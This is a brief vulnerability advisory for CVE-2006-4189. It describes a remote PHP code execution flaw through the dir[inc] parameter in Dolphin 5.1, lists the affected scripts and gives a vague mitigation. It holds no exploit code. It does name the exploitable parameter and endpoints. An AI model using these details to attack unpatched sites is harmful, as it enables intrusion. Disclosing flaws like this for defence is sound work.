CVE-2006-4189

Name of the Vulnerable Software and Affected Versions Dolphin version 5.1

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the dir[inc] parameter in multiple PHP scripts, including "index.php", "aemodule.php", "browse.php", "cc.php", "click.php", "faq.php", "gallery.php", "im.php", "inbox.php", "join form.php", "logout.php", "messages inbox.php", and many other scripts.

Recommendations For Dolphin version 5.1, consider restricting access to the dir[inc] parameter in the affected PHP scripts until a patch is available. As a temporary workaround, avoid using the dir[inc] parameter in the vulnerable API endpoints, such as "index.php", "aemodule.php", and others, to minimize the risk of exploitation.